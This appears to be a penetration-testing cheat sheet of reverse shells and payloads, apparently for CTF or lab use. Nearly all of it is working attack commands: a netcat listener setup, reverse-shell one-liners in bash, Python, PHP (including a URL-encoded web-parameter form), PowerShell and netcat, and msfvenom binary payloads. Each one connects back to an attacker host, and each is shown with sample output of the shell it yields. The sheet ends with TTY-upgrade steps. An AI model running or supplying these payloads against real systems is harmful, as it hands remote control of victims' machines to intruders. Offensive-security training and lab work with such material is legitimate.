REVERSE SHELLS & PAYLOADS

Start listener

Always set up first — Use port 443 (less likely filtered)

nc -nlvp 443
or: rlwrap nc -nlvp 443
Example Output
nc -nlvp 443
Listening on 0.0.0.0 443

OR better:
rlwrap nc -nlvp 443
(rlwrap gives arrow key history in shell)

Bash reverse shell

Linux/Mac — Most reliable on Linux

bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1
Example Output
bash -i >& /dev/tcp/10.10.14.2/443 0>&1

Attacker:
connect to [10.10.14.2] from [10.10.10.5] 48234
bash-4.4$ whoami
www-data

Python reverse shell

If Python is installed — Very common on Linux

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Example Output
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Attacker: $ whoami
www-data

PHP reverse shell (one-liner)

In command injection or upload — Or use pentestmonkey full shell

php -r '$sock=fsockopen("ATTACKER_IP",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Example Output
php -r '$sock=fsockopen("10.10.14.2",443);exec("/bin/sh -i <&3 >&3 2>&3");'

OR in a web parameter:
cmd=php+-r+'$s=fsockopen("10.10.14.2",443);exec("/bin/sh+-i+<&3+>&3+2>&3");'

Attacker:
$ whoami
www-data
(Inline PHP shell, no file upload needed)

PowerShell reverse shell

Windows targets — Or use Nishang Invoke-PowerShellTcp

powershell -e <base64_payload>
Generate: msfvenom -p cmd/windows/reverse_powershell LHOST=ATTACKER_IP LPORT=443
Example Output
powershell -e JABjAGwAaQBlAG4A...(base64)

Attacker:
connect from 10.10.10.5
PS C:\Users\admin> whoami
corp\admin

nc reverse shell

Netcat — Try both -e and mkfifo versions

nc -e /bin/sh ATTACKER_IP 443
or: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 443 >/tmp/f
Example Output
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 443 >/tmp/f

Attacker:
$ whoami
www-data
(Use this version when nc -e isn't available)

msfvenom payloads

Generate binary payloads — For upload + execute scenarios

Windows: msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f exe -o shell.exe
Linux: msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f elf -o shell.elf
Example Output
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -o shell.exe

Payload size: 460 bytes
Saved as: shell.exe

Transfer to target, execute, catch with nc

Upgrade to TTY shell

After getting basic shell — Full interactive shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
Example Output
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@target:/var/www$ ^Z
[1]+  Stopped
$ stty raw -echo; fg
www-data@target:/var/www$ export TERM=xterm
(Now have full interactive shell with tab complete)

revshells.com

Generate any reverse shell — Bookmark this

https://www.revshells.com/
Example Output
Visit https://www.revshells.com/
Select: Bash -i, Python3, PHP, PowerShell #3
Enter: IP and Port
Copy generated payload
(Auto-generates reverse shells for any language)